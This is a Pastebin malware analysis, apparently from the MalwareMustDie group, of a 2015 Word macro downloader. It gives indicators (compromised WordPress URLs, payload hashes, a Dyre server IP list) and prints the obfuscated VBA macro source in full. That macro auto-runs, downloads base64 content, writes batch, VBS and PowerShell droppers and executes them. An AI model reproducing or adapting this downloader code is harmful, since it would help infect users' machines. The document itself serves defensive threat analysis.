API tools faq
paste
Advertisement
MalwareMustDie

MS Doc VB Macro downloader WP sites

MalwareMustDie
Jul 20th, 2015
3,702
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VBScript 22.92 KB | None | 0 0
raw download clone embed print report
  1. ## MalwareMustDie! .DOC VB MACRO DOWNLOADER MALWARE
  2. ##  Analyzed: Tue Jul 21 13:37:22 2015 @unixfreaxjp
  3. ## PCAP snips at https://twitter.com/MalwareMustDie/status/623363680516747264
  4.  
  5. ## THE WORDPRESS SITES SERVED AS DOWNLOAD SERVERS:
  6. www.buck.tv/cms/wp-content/uploads/78672738612836.txt
  7. www.buck.tv/cms/wp-content/uploads/papa.txt
  8. www.bereciartua.com//wp-content/themes/bereciartua/78672738612836.txt
  9. www.bereciartua.com/wp-content/themes/bereciartua/papa.txt
  10.  
  11. ## downloaded payload in:
  12. h00p://195.154.93.8/123a.exe (Upatre/camouflaged as PDF docs 290be6c95016005dc2f0a16c411066d2)
  13. // check own ip toy: icanhazip.com
  14. ## downloaded payload in:
  15. https://[IP-LIST]/teu12.tar (Dyre. PE EXE 9e9cdc46a78c2dfa9220f010d11b53cc)
  16. (see below of post for the ip-list..)
  17.  
  18. via ssl..
  19. 00000000  16 03 01 00 65 01 00 00  61 03 01 55 ad d1 ae d3 ....e... a..U....
  20. 00000010  8e db d3 63 56 61 5d 01  1f 07 21 1c ff a9 b6 9d ...cVa]. ..!.....
  21. 00000020  52 9f fa ba 23 d1 33 a2  f8 6c c9 00 00 18 00 2f R...#.3. .l...../
  22. 00000030  00 35 00 05 00 0a c0 09  c0 0a c0 13 c0 14 00 32 .5...... .......2
  23. 00000040  00 38 00 13 00 04 01 00  00 20 00 05 00 05 01 00 .8...... . ......
  24. 00000050  00 00 00 00 0a 00 08 00  06 00 17 00 18 00 19 00 ........ ........
  25. 00000060  0b 00 02 01 00 ff 01 00  01 00                   ........ ..
  26.     00000000  16 03 01 00 51 02 00 00  4d 03 01 55 ad d1 cb 46 ....Q... M..U...F
  27.     00000010  41 31 79 ea 5c 3a 33 64  51 4c 6c b8 03 09 50 21 A1y.\:3d QLl...P!
  28.     00000020  13 c7 ad 13 f5 81 d6 69  fe ac 07 20 cf cf 0e c1 .......i ... ....
  29.     00000030  63 4c 32 69 ed 65 5f 9d  b9 26 5e 7f 44 f3 16 de cL2i.e_. .&^.D...
  30.  
  31. ## OF WORD DOC FILE HASHES:
  32. ## Sample : ./bounty.doc
  33. ## MD5    : 22b468fc88e8ec7d264b507b0d4df02c
  34. ## SHA256 : a811a3701e10e227f0ad02fad5bd1200feba6c765c89276541169413524cca85
  35. 00000000  d0 cf 11 e0 a1 b1 1a e1  00 00 00 00 00 00 00 00  |................|
  36. 00000010  00 00 00 00 00 00 00 00  3e 00 03 00 fe ff 09 00  |........>.......|
  37. 00000020  06 00 00 00 00 00 00 00  00 00 00 00 02 00 00 00  |................|
  38. 00000030  44 00 00 00 00 00 00 00  00 10 00 00 47 00 00 00  |D...........G...|
  39. 00000040  02 00 00 00 fe ff ff ff  00 00 00 00 43 00 00 00  |............C...|
  40. 00000050  80 00 00 00 ff ff ff ff  ff ff ff ff ff ff ff ff  |................|
  41. 00000060  ff ff ff ff ff ff ff ff  ff ff ff ff ff ff ff ff  |................|
  42.  
  43. ## CURRENT VIRUS CHECK:
  44. ## Detection ratio: 30 / 55
  45. ## Analysis date: 2015-07-20 23:37:32 UTC ( 4 hours, 46 minutes ago )
  46. ##         Antivirus                     Result                Update
  47. ##    ALYac                W97m.Downloader.UN                 20150720
  48. ##    AVG                  W97M/Generic                       20150721
  49. ##    AVware               LooksLike.Macro.Malware.gen!d1 (v) 20150720
  50. ##    Ad-Aware             W97m.Downloader.UN                 20150720
  51. ##    AhnLab-V3            DOC/Downloader                     20150720
  52. ##    Arcabit              W97m.Downloader.UN                 20150720
  53. ##    Avast                VBA:Downloader-HH [Trj]            20150720
  54. ##    Avira                W97M/Dldr.Agent.71168.B            20150721
  55. ##    BitDefender          W97m.Downloader.UN                 20150720
  56. ##    Cyren                Downloader.QTDD-                   20150720
  57. ##    DrWeb                W97M.DownLoader.496                20150721
  58. ##    ESET-NOD32           VBA/TrojanDownloader.Agent.XJ      20150720
  59. ##    Emsisoft             W97m.Downloader.UN (B)             20150721
  60. ##    F-Prot               W97M/Bartallex.C                   20150720
  61. ##    F-Secure             Trojan:W97M/MaliciousMacro.GEN     20150720
  62. ##    Fortinet             WM/Agent!tr                        20150720
  63. ##    GData                W97m.Downloader.UN                 20150720
  64. ##    Ikarus               Trojan-Downloader.VBA.Agent        20150720
  65. ##    Kaspersky            Trojan-Downloader.VBS.Agent.ank    20150720
  66. ##    McAfee               W97M/Downloader.ajz                20150720
  67. ##    McAfee-GW-Edition    W97M/Downloader.ajz                20150720
  68. ##    MicroWorld-eScan     W97m.Downloader.UN                 20150720
  69. ##    Sophos               Troj/DocDl-UL                      20150721
  70. ##    Symantec             W97M.Downloader                    20150721
  71. ##    Tencent              Vbs.Trojan-downloader.Agent.Hqvk   20150721
  72. ##    TrendMicro           W2KM_BARTALEX.XXUB                 20150720
  73. ##    TrendMicro-HouseCall W2KM_BARTALEX.XXUB                 20150720
  74. ##    VIPRE                LooksLike.Macro.Malware.gen!d1 (v) 20150720
  75. ##    ViRobot              W97M.S.Agent.71168.B[h]            20150720
  76. ##    nProtect             W97m.Downloader.UN                 20150720
  77. ##
  78.  
  79.  
  80. ## THE VB SCRIPT DETECTED IN MACRO
  81. ##
  82. ## (Neutralized) VB Macro Code
  83. ##
  84.  
  85. Attribute VB_Name = "Module1"
  86.  
  87. Public Function Xjdkhjfwefw(a As Object)
  88. Xjdkhjfwefw = (a.responseText)
  89. End Function
  90.  
  91.  
  92. Attribute VB_Name = "Module2"
  93.  
  94. Public Function Goabc(sps As String)
  95. QBYDGQWDWQ = "1hj2ehjg 1h2fegh12fehg12 " & "j1g2ehj21g 21"
  96. QBYADGQWDWQ = "1sdhj2ehjg 1h2fegh12fehg12 " & "j1g2ehj21g 21"
  97. QBYXDGQWDWQ = "1hj2ehjdsg 1h2fegh12fehg12 " & "j1g2ehj21g 21"
  98. Goabc = Environ(sps)
  99. End Function
  100. Public Function Linolium(nbqjbdjqw As String)
  101. Dim dhjqwqkjww As Integer, aaqjwhdq As Integer, Kjqiwdhqwuhdjqkwhdjkqwbd As Object, AHUDWQI As String
  102. Dim ashdUHhda As String, hausd As Integer
  103. ashdUHhda = nbqjbdjqw
  104. hausd = Sgn(0 - Abs(Cos(140)))
  105. BQDHJQWDGWQJGS = "MSXML2.ServerXMLH" & Chr(85 + hausd) & Chr(84) & Chr(80)
  106. 'MsgBox (BQDHJQWDGWQJGS)
  107. Set Kjqiwdhqwuhdjqkwhdjkqwbd = CreateObject(BQDHJQWDGWQJGS)
  108. Kjqiwdhqwuhdjqkwhdjkqwbd.Open "GE" & "" & "T", ashdUHhda
  109. Kjqiwdhqwuhdjqkwhdjkqwbd.Send (AHUDWQI)
  110. Linolium = Module1.Xjdkhjfwefw(Kjqiwdhqwuhdjqkwhdjkqwbd)
  111. End Function
  112. Sub WaitFor(NumOfSeconds As Long)
  113. Dim SngSec As Long
  114. SngSec = Timer + NumOfSeconds
  115. Do While Timer < SngSec
  116. DoEvents
  117. Loop
  118. End Sub
  119.  
  120. Attribute VB_Name = "Module3"
  121.  
  122. Public Function India(dnuwhd As String, b As String, c As Integer)
  123. Dim selectedText As String
  124. Dim ssjidoqwhduqhwidqwudihq As Range, lesleslesqjhdjqkwhdwq As Range
  125. Set ssjidoqwhduqhwidqwudihq = ActiveDocument.Range
  126. HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
  127. HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
  128. With ssjidoqwhduqhwidqwudihq.Find
  129. 'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
  130. 'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
  131. .Text = dnuwhd
  132. .MatchWholeWord = True
  133. ssjidoqwhduqhwidqwudihq.Find.Execute
  134. ssjidoqwhduqhwidqwudihq.Collapse direction:=wdCollapseEnd
  135. Dim wdwq As String
  136. Set lesleslesqjhdjqkwhdwq = ActiveDocument.Range
  137. Dim wdsadwq As String
  138. lesleslesqjhdjqkwhdwq.Start = ssjidoqwhduqhwidqwudihq.End
  139. .Text = b
  140. .MatchWholeWord = True
  141. .Execute
  142. RHQHDQWUHDQKW = "h1j2he kh12jgh12 feg21fgeh12fjy"
  143. RHQHDQWUHDQKW = "h1j2he kh12jgh12 feg21fgeh12fjy"
  144. ssjidoqwhduqhwidqwudihq.Collapse direction:=wdCollapseStart
  145. lesleslesqjhdjqkwhdwq.End = ssjidoqwhduqhwidqwudihq.Start
  146.  
  147. If (c = 1) Then
  148.     selectedText = lesleslesqjhdjqkwhdwq.Delete
  149. End If
  150. If (c = 2) Then
  151.     lesleslesqjhdjqkwhdwq.Font.Color = wdColorBlack
  152. End If
  153.  
  154. Dim hduwaa As Integer
  155. hduwaa = 1 - 2 ^ 4
  156.  
  157. QHUDW = Chr(33 + Sgn(hduwaa))
  158.  
  159. If (c = 3) Then
  160.     With ssjidoqwhduqhwidqwudihq.Find
  161.     .Text = a
  162.     .Replacement.Text = QHUDW
  163.     'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
  164.    'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
  165.    'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
  166.    'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
  167.    .Wrap = wdFindContinue
  168.     .Execute Replace:=wdReplaceAll
  169.     End With
  170. End If
  171.  
  172. End With
  173. End Function
  174.  
  175. Public Function HowEver(a As Variant, b)
  176. VGQDVHQWD = "h2eh1 fg12e"
  177. a = Shell(b, 0)
  178. HowEver = a
  179. End Function
  180.  
  181. ##
  182. ## MAIN COURSE IS HERE....
  183. ##
  184.  
  185. Attribute VB_Name = "ThisDocument"
  186. Attribute VB_Base = "1Normal.ThisDocument"
  187. Attribute VB_GlobalNameSpace = False
  188. Attribute VB_Creatable = False
  189. Attribute VB_PredeclaredId = True
  190. Attribute VB_Exposed = True
  191. Attribute VB_TemplateDerived = True
  192. Attribute VB_Customizable = True
  193. Sub Dqwkdojqwiodqw_Open()
  194.      
  195. End Sub
  196. Sub Ejoqiwjdioqwjdqo_Open()
  197.      
  198. End Sub
  199. Sub Auto_Open()
  200.     Djiqowjdwoiqjdqwo
  201. End Sub
  202. Sub Djiqowjdwoiqjdqwo()
  203.     UQHDIQWHD = "1j2h eiuh1k2jeh21kjeh jk12g ehj12g"
  204.     Xjqwidjowqjdq
  205. End Sub
  206. Sub Giqjwdhqwkjq()
  207.     DQUHWDIWQ = "eji21h ui21he21"
  208. End Sub
  209.  
  210. Sub AutoOpen()
  211.     Auto_Open
  212. End Sub
  213. Sub Workbook_Open()
  214.     NJQWBDJQKW = "j2hge h1hj1g2 hj21gje "
  215.     Auto_Open
  216. End Sub
  217.  
  218. Sub Xjqwidjowqjdq()
  219.  
  220.    
  221.     Dim fallout As Integer, silkroad As Integer, inclife As Integer, inredible As Integer
  222.     Dim retVal As Variant, gana As Integer, turkey As Integer, malay As Integer, SPAIN As String, BOLIVIA As String
  223.     BOLIVIA = Chr(90 + 2)
  224.    
  225.    
  226.     ANGOLA = Ubqhwdhwqbd(15425) + ""
  227.     SPAIN = Chr(84) & "em" + "p"
  228.     QHDQUWH = ANGOLA
  229.     FL2 = QHDQUWH
  230.     PH2 = Module2.Goabc(SPAIN) + BOLIVIA
  231.    
  232.     silkroad = 9
  233.     jwnqdw = -1
  234.    
  235.     BOSNIA = 12312312
  236.     BOSNIA = 1 + 1 + 113 + Sgn(jwnqdw)
  237.     BALAGAN = BOSNIA
  238.    
  239.  
  240.     TROYA = "banbv2dbgh21f gd2h1f21ghfd gh12fgh1t"
  241.     JWIDJIAAA = ""
  242.     HUYFEA = "gdhjqwg hqjwgdhjqwg hjqwgdhjqwg"
  243.     QIWJDABB = "b"
  244.     HUYFEA = QIWJDABB + "a" + "t"
  245.     IUQJWD = "bjgqhdhjg21jhgdhj1g jh1eg hj21ge j2h"
  246.     PSFL = FL2 + "" & "" + "." + "p" + "" + Chr(115) + Chr(49)
  247.    
  248.     gana = NUqwdqwbdsad(1 - 300 * Sin(20))
  249.     SSS = Chr(BALAGAN + 2 + gana)
  250.     VBFL = FL2 + Chr(50 - 4) + "v" + "" + "" & "b" & "" & SSS & ""
  251.     BAFL = FL2 + Chr(NUqwdqwbdsad(Fix(-22.043)) + 31 - 10 + 25 + gana + 2) + HUYFEA
  252.    
  253.     INTG = "" & "o" & "bject"
  254.     KIWD = Chr(110 + NUqwdqwbdsad(Len(BAFL))) + "dule"
  255.     AFTG = Chr(109) & KIWD
  256.    
  257.     SXEE = Chr(46)
  258.     SXAA = Chr(101)
  259.     SXE = SXEE & SXAA & "" & "xe"
  260.     GNG = Chr(2 ^ 2 + 42) + "jpg"
  261.    
  262.    
  263.    
  264.     HUQD = Chr(30 + 16 + 1)
  265.     ATTH = "ht" & "t" & "" & "p" & ":" & "/" & Chr(47)
  266.     BQHJDQ = "sav" + "epic" & Chr(46) & "su" + HUQD
  267.      
  268.     PSPTH = PH2 + PSFL
  269.     VBPTH = PH2 + VBFL
  270.     BAPTH = "1hj2gehj12g1h f2gh112 feg1h2f e"
  271.     ABPTH = PH2 + BAFL
  272.     BAPTH = ABPTH
  273.     JHQKWDQAASS = BQHJDQ
  274.    
  275.     Dim BALAGANHUQW As Integer, DRT As Integer, BFT As Integer, CFT As Integer, DFT As Integer, EFT As Integer, CONT As String
  276.    
  277.     DRT = 315
  278.     BFT = 316
  279.     CFT = 317
  280.     DFT = 318
  281.     EFT = 319
  282.     Dim NUWDHUQHUQWDH As String
  283.     NUWDHUQHUQWDH = "USE" & "RPROFILE"
  284.     Dim PBIn As String, asdwq As String, MIWDWQ As String
  285.    
  286.    
  287.    
  288.     TSTS = "." + "t" + "xt"
  289.     CDDD = "78672738612836" + TSTS
  290.     LNSS = "p" & "a" & "p" & "a" & "" + TSTS
  291.     STT1 = "www.buck.tv/cms/w" & "p-co" & "ntent/up" & "loads/"
  292.     STT2 = "www.bereciartua.com/w" & "p-cont" & "ent/th" & "emes/bere" & "ciartua/"
  293.  
  294.  
  295.     PBIn = ATTH + STT1 + CDDD
  296.     CONT = Module2.Linolium(PBIn)
  297.      
  298.     asdwq = Rasdas(CONT)
  299.    
  300.     HQUWDAAA = "0"
  301.     If (asdwq <> "=") Then
  302.         PBIn = ATTH + STT2 + CDDD
  303.         CONT = Module2.Linolium(PBIn)
  304.         asdwq = CONT
  305.         HQUWDAAA = "1"
  306.     End If
  307.    
  308.     CONT = Quqhwdbyas(asdwq)
  309.      
  310.     Dim ahuywdgqy As String
  311.      
  312.     TVT10 = Port(CONT, "t" & "ext10")
  313.     TVT20 = Port(CONT, "t" & "ext20")
  314.     TVT21 = Port(CONT, "t" & "ext21")
  315.     TVT30 = Port(CONT, "t" & "ext30")
  316.     TVT31 = Port(CONT, "t" & "ext31")
  317.     XPT1 = Port(CONT, "stext1")
  318.     XPT2 = Port(CONT, "stext2")
  319.     XPT3 = Port(CONT, "stext3")
  320.    
  321.    
  322.     WVR = Module2.Goabc(NUWDHUQHUQWDH)
  323.     hufehu1 = InStr(WVR, "sers\")
  324.    
  325.     Dim hudhw As Integer
  326.     Dim ghdAdd(1 To 3)
  327.     ghdAdd(1) = "1"
  328.     ghdAdd(2) = "0"
  329.     ghdAdd(3) = "0"
  330.    
  331.     If (hufehu1 <> 0) Then
  332.         ghdAdd(1) = "2"
  333.     Else
  334.         ghdAdd(2) = "3"
  335.     End If
  336.  
  337.  
  338.     JHWQUD = Join(ghdAdd)
  339.     hudhw = Val(JHWQUD)
  340.    
  341.     Module2.WaitFor (1)
  342.    
  343.     MIWDWQ = ATTH + STT1 + LNSS
  344.     If (HQUWDAAA = "1") Then
  345.         MIWDWQ = ATTH + STT2 + LNSS
  346.     End If
  347.    
  348.     SEXX = Module2.Linolium(MIWDWQ)
  349.    
  350.     PSTB = PBIn + "123123123"
  351.     MSTAR1 = JHQKWDQAASS + "5751812" + GNG
  352.     MSTAR2 = JHQKWDQAASS + "5757956" + GNG
  353.     STAR1 = ATTH + MSTAR1
  354.     STAR2 = ATTH + MSTAR2
  355.     FFQ = "8"
  356.     FF = FFQ + SXE
  357.    
  358.      If (hudhw = 130) Then
  359.      Open BAPTH For Output As #DRT
  360.      Print #DRT, XPT1
  361.      Print #DRT, ":jadkjasghdjasg" & vbCrLf & "set trfd=" + Chr(34) + PH2 + Chr(34)
  362.      Print #DRT, "set nmsj=" + Chr(34) + FL2 + Chr(34)
  363.      Print #DRT, "set exds=" + Chr(34) + FFQ + Chr(34)
  364.      Print #DRT, XPT2
  365.      Close #DRT
  366.      
  367.      Module2.WaitFor (1)
  368.      
  369.      Open VBPTH For Output As #BFT
  370.      Print #BFT, "strRT = " + Chr(34) + SEXX + Chr(34)
  371.      Print #BFT, "statRT = " + Chr(34) + STAR1 + Chr(34)
  372.      Print #BFT, "" & "jfeu" & "ygq = " + Chr(34) & "" + FF + Chr(34) & ""
  373.      Print #BFT, "strTecation = " + Chr(34) + PH2 + Chr(34) + "+jfeuygq"
  374.      Print #BFT, XPT3
  375.      Close #BFT
  376.      
  377.      BDDT.WaitFor (1)
  378.      NTH1 = Module3.HowEver(retVal, BAPTH)
  379.      
  380.      End If
  381.      
  382.      
  383.      HUDQG = "';"
  384.      
  385.      
  386.      
  387.       If (hudhw = 200) Then
  388.        
  389.      ZPQSKD = FL2
  390.      Open PSPTH For Output As #CFT
  391.      Print #CFT, "$nqjkwdnq = 'qiwdqwhd';"
  392.      Print #CFT, "$ndqbwdwqs = 'jqwdnjkqwhd';"
  393.      Print #CFT, "$stat = 'ht'+'tp://'+''+'" + MSTAR2 + "';"
  394.      Print #CFT, "$ggtt = '" + SEXX + "';"
  395.      Print #CFT, "$pths = '" + PH2 + HUDQG
  396.      
  397.      Print #CFT, "$wehs = '" + ZPQSKD + HUDQG
  398.      Print #CFT, "$nnm = '" + FFQ + "';"
  399.      Print #CFT, TVT10
  400.      Close #CFT
  401.      
  402.      Open VBPTH For Output As #DFT
  403.      Print #DFT, TVT30
  404.      Print #DFT, "c" + "urrentFile = " + Chr(34) + PH2 + Chr(34) + "&" + Chr(34) + FL2 + Chr(34) + "&huih"
  405.      Print #DFT, TVT31
  406.      Close #DFT
  407.    
  408.      Open BAPTH For Output As #EFT
  409.      Print #EFT, Chr(30 + 30 + 4) + "echo off" & vbCrLf & ":jqduqihdjsakd"
  410.      Print #EFT, TVT20
  411.      Print #EFT, "set Ads3=" + Chr(34) + FL2 + Chr(34)
  412.      Print #EFT, ":nqudiiqhdjkashd"
  413.      Print #EFT, "set Mts4=" + Chr(34) + PH2 + Chr(34)
  414.      Print #EFT, ":nqjdkbjkbdhjqwb"
  415.      Print #EFT, "set Rts4=" + "%Mts4%%Ads3%"
  416.      Print #EFT, TVT21
  417.      Close #EFT
  418.      Module2.WaitFor (1)
  419.      
  420.      NTH2 = Module3.HowEver(retVal, BAPTH)
  421.      
  422.      End If
  423.      
  424.     JUW = Chr(47)
  425.     AKK = Chr(60)
  426.     ZKK = ">"
  427.     NTH3 = Module3.India(AKK + INTG + ZKK, AKK & JUW + INTG + ZKK, 1)
  428.     NTH4 = Module3.India(AKK + AFTG + ZKK, AKK + JUW + AFTG + ZKK, 2)
  429.     NTH5 = Module3.India(AKK + INTG + ZKK, "", 3)
  430.     NTH6 = Module3.India(AKK + JUW + INTG + ZKK, "", 3)
  431.     NTH7 = Module3.India(AKK + AFTG + ZKK, "", 3)
  432.     NTH8 = Module3.India(AKK + JUW + AFTG + ZKK, "", 3)
  433.    
  434. End Sub
  435.  
  436.  
  437. Public Function NUqwdqwbdsad(a As Integer)
  438. NUqwdqwbdsad = Sgn(a)
  439. End Function
  440.  
  441. Public Function Hhqudhqwgyuqwaaa(a As Integer)
  442. Hhqudhqwgyuqwaaa = Sgn(a)
  443. End Function
  444.  
  445. Public Function Ubqhwdhwqbd(a As Integer)
  446. Ubqhwdhwqbd = CStr(Int((a * Rnd) + 10000))
  447. End Function
  448.  
  449.  
  450. Public Function Quqhwdbyas(ByVal strData As String) As String
  451.     Dim objXML As Object
  452.     Dim objNode As Object
  453.     Dim asduiwhqdqiw As Integer, nudqwd As Integer, sshquwdq As Integer
  454.     nudqwd = Log10(100)
  455.     asduiwhqdqiw = Hhqudhqwgyuqwaaa(1 - nudqwd)
  456.     QHDHUQW = "" & Chr(78 + asduiwhqdqiw) + "SXML2.DOMDocument"
  457.     Set objXML = CreateObject(QHDHUQW)
  458.     Set objNode = objXML.createElement("b6" + "4")
  459.     objNodeS = "1m2hjkh12 jghehj1gehj12ge j12j1he12"
  460.     objNodeE = "1m2hjkh12 jghehj1gehj12ge j12j1he12"
  461.     objNodeQ = "1m2hjkh12 jghehj1gehj12ge j12j1he12"
  462.     objNodeZ = "1m2hjkh12 jghehj1gehj12ge j12j1he12"
  463.     objNode.DataType = "bin.b" + Chr(97) + "se" + "6" & "4"
  464.     objNode.Text = strData
  465.     WUDHA = objNode.nodeTypedValue
  466.     Quqhwdbyas = WUDHA
  467.     Set objNode = Nothing
  468.     Set objXML = Nothing
  469. End Function
  470.  
  471. Public Function Port(a, b As String)
  472. Dim krd, tent As Integer
  473. UQWD = "" & Chr(58 + 2)
  474. NDUW = "" & Chr(70 - 8)
  475. krd = InStr(1, a, UQWD + b + NDUW) + 8
  476. tent = InStr(1, a, UQWD + "/" + b + NDUW) - krd
  477. KLMN = Mid$(a, krd, tent)
  478. HUQHWDA = KLMN
  479. Port = HUQHWDA
  480. End Function
  481.  
  482. Private Static Function Rasdas(a As String)
  483. Rasdas = Right(a, 1)
  484. End Function
  485.  
  486. Private Static Function Log10(x)
  487. SWOPJDQIOW = "jqhw gdhjg12hjgd21g21d"
  488. Log10 = Log(x) / Log(10#)
  489. End Function
  490.  
  491.  
  492. ##
  493. ## HTTP HEADER REQUESTS SENT :
  494. ## (for mitigation)
  495.  
  496. GET /cms/wp-content/uploads/78672738612836.txt HTTP/1.1
  497. Accept-Language: en-us
  498. Accept: */*
  499. User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  500. Host: www.buck.tv
  501. Connection: Keep-Alive
  502.  
  503. GET /wp-content/themes/bereciartua/78672738612836.txt HTTP/1.1
  504. Accept-Language: en-us
  505. Accept: */*
  506. User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  507. Host: www.bereciartua.com
  508. Connection: Keep-Alive
  509.  
  510. ##
  511. ## IP LIST FOR CLEAN UP (SERVES DYRE aka IP-LIST/sorted)
  512. ##  30 of these IP is in the United States network..
  513. ##
  514. 104.174.123.66|cpe-104-174-123-66.socal.res.rr.com.|20001 | 104.172.0.0/14 | ROADRUNNER-WEST | US | twcable.com | Time Warner Cable Internet LLC
  515. 109.86.226.85|85.226.86.109.triolan.net.|13188 | 109.86.224.0/22 | BANKINFORM | UA | triolan.net | Content Delivery Network Ltd
  516. 173.216.247.74|173-216-247-74-brns.mid.dyn.suddenlink.net.|19108 | 173.216.0.0/16 | SUDDENLINK-COMMUNICA | US | suddenlink.com | Suddenlink Communications
  517. 173.243.255.79|173.243.240.79.rhinocommunications.net.|17306 | 173.243.255.0/24 | RISE-BROADBAND | US | jabbroadband.com | Jab Wireless Inc.
  518. 173.248.31.6|cameron-31-6.dsl.chibardun.net.|26472 | 173.248.24.0/21 | CHIBARDUN-TEL | US | mosaictelecom.net | Mosaic Telecom
  519. 176.36.251.208|host-176-36-251-208.la.net.ua.|39608 | 176.36.0.0/14 | LANETUA | UA | lanet.ua | Lanet Network Ltd
  520. 178.222.250.35|178-222-250-35.static.isp.telekom.rs.|8400 | 178.220.0.0/14 | TELEKOM | RS | telekom.rs | Telekom Srbija ADSL Users
  521. 188.255.236.184|free-236-184.mediaworksit.net.|52116 | 188.255.236.0/22 | ORIONTELEKOMTIM | RS | oriontelekom.rs | Orion Telekom Tim d.o.o.Beograd
  522. 188.255.239.34|free-239-34.mediaworksit.net.|52116 | 188.255.236.0/22 | ORIONTELEKOMTIM | RS | oriontelekom.rs | Orion Telekom Tim d.o.o.Beograd
  523. 188.255.243.105|free-243-105.mediaworksit.net.|52116 | 188.255.242.0/23 | ORIONTELEKOMTIM | RS | oriontelekom.rs | Orion Telekom Tim d.o.o.Beograd
  524. 194.106.166.22||6700 | 194.106.166.0/24 | BEOTEL | RS | - | InterCom Computers
  525. 194.228.203.19|19.telenet.cz.|5610 | 194.228.192.0/18 | O2-CZECH | CZ | telenet.cz | Komenskeho
  526. 209.40.238.170||32393 | 209.40.232.0/21 | BDN | US | browndognetworks.com | Brown Dog Networks
  527. 216.16.93.250|stormlakeDHCP-250.216-16-93.knology.net.|12083 | 216.16.0.0/17 | WOW-INTERNET | US | knology.net | PrairieWave Static Host Assignment
  528. 216.254.231.11|watertownDHCP-11.216-254-231.knology.net.|12083 | 216.254.224.0/20 | WOW-INTERNET | US | knology.net | PrairieWave Cable Modem DHCP
  529. 217.168.210.122|IP-10-122.trionet.cz.|33883 | 217.168.208.0/20 | TRIONET-CZ | CZ | trionet.cz | TRIOPTIMUM s.r.o.
  530. 24.148.217.188|user-0c99mds.cable.mindspring.com.|11426 | 24.148.192.0/19 | SCRR-11426 | US | earthlink.net | Earthlink Inc.
  531. 24.220.92.193|host-193-92-220-24.midco.net.|11232 | 24.220.64.0/18 | MIDCO-NET | US | midcocomm.com | MidContinent Media Inc
  532. 24.33.131.116|cpe-24-33-131-116.cinci.res.rr.com.|10796 | 24.33.128.0/18 | SCRR-10796 | US | twcable.com | Time Warner Cable Internet LLC
  533. 37.57.144.177|177.144.57.37.triolan.net.|13188 | 37.57.144.0/24 | BANKINFORM | UA | triolan.net | Content Delivery Network Ltd
  534. 64.111.36.52|64-111-36-52.static.fiber4.net.|62943 | 64.111.36.0/24 | BLUEBIRD-NETWORK |  | mwdata.net | Midwest Data Center
  535. 65.33.236.173|65-33-236-173.res.bhn.net.|33363 | 65.32.0.0/15 | BHN-TAMPA | US | twcable.com | Time Warner Cable Internet LLC
  536. 66.215.30.118|66-215-30-118.dhcp.mtpk.ca.charter.com.|20115 | 66.215.0.0/19 | CHARTER-NET-HKY-NC | US | charter.net | Charter Communications
  537. 67.206.96.68||8025 | 67.206.96.0/19 | BRIGHTOK-AS | US | chickasawphone.com | Chickasaw Telephone
  538. 67.207.229.215|swoid229p215-d.swoi.brightok.net.|8025 | 67.207.224.0/19 | BRIGHTOK-AS | US | brightok.net | Southwest Oklahoma Internet
  539. 67.221.195.6|67-221-195-6.static.fiber4.net.|62943 | 67.221.195.0/24 | BLUEBIRD-NETWORK |  | mwdata.net | Midwest Data Center
  540. 67.22.167.163|price-east-fttx-67-22-167-163.dynamic.etv.net.|36728 | 67.22.160.0/20 | EMERYTELCOM | US | emerytelcom.com | Emery Telcom
  541. 67.222.197.54|ip-dhcp-67-222-197-54.dsl.blr.abbnebraska.com.|16604 | 67.222.192.0/20 | HUNTEL-NET | US | huntel.net | Huntel.net
  542. 68.119.5.32|68-119-5-32.dhcp.unas.wa.charter.com.|20115 | 68.119.0.0/20 | CHARTER-NET-HKY-NC | US | charter.net | Charter Communications
  543. 68.55.59.145|c-68-55-59-145.hsd1.mi.comcast.net.|7922 | 68.32.0.0/11 | COMCAST-7922 | US | comcast.net | Comcast Cable Communications Inc.
  544. 68.70.242.203|cablepool6-203.ranchomurieta.org.|46514 | 68.70.242.0/24 | RANCHOMURIETAASSOCIA | US | ranchomurieta.org | Rancho Murieta Association
  545. 69.144.171.44|host-69-144-171-44.static.bresnan.net.|33588 | 69.144.0.0/15 | BRESNAN-AS | US | charter.net | Charter Communications
  546. 69.163.81.211||11924 | 69.163.81.0/24 | MONTANA-OPTICOM | US | mt-opticom.com | Montana Opticom LLC
  547. 69.8.50.85||8025 | 69.8.0.0/18 | BRIGHTOK-AS | US | paradoxnetworks.net | Southwest Oklahoma Internet
  548. 69.9.204.114|host-114-204-9-69-static.midco.net.|11232 | 69.9.192.0/18 | MIDCO-NET | US | midco.net | MN Wireless
  549. 72.230.82.80|cpe-72-230-82-80.twcny.res.rr.com.|11351 | 72.230.0.0/16 | RR-NYSREGION-ASN-01 | US | twcable.com | Time Warner Cable Internet LLC
  550. 76.84.81.120|cpe-76-84-81-120.neb.res.rr.com.|11427 | 76.84.0.0/16 | SCRR-11427 | US | twcable.com | Time Warner Cable Internet LLC
  551. 77.48.30.156||6830 | 77.48.0.0/17 | LGI | AT | takin.cz | Radynet s.r.o.
  552. 81.90.175.7||25036 | 81.90.160.0/20 | TERMSNET | CZ | scnet.cz | Internethome S.R.O.
  553. 81.93.205.218|rev.81-93-205-218.rednet.hu.|24991 | 81.93.204.0/22 | DATATRANS | HU | datatrans.hu | Datatrans Internet Ltd
  554. 81.93.205.251|rev.81-93-205-251.rednet.hu.|24991 | 81.93.204.0/22 | DATATRANS | HU | datatrans.hu | Datatrans Internet Ltd
  555. 84.246.161.47|glwifi.ic.cz.|39761 | 84.246.160.0/21 | ABAK | CZ | wendulka.net | Abak Ltd.
  556. 85.135.104.170||30764 | 85.135.0.0/17 | PODA | CZ | poda.cz | PODA a.s.
  557. 87.249.142.189|kaspar.p.3.sdl.core.ttnet.cz.|34040 | 87.249.128.0/19 | CZTTNET | CZ | ttnet.cz | TTNET s.r.o.
  558. 94.154.107.172|free-94-154-107-172.kingsnet.rs.|56843 | 94.154.107.0/24 | KINGSNET | RS | kingsnet.rs | Kingsnet d.o.o.
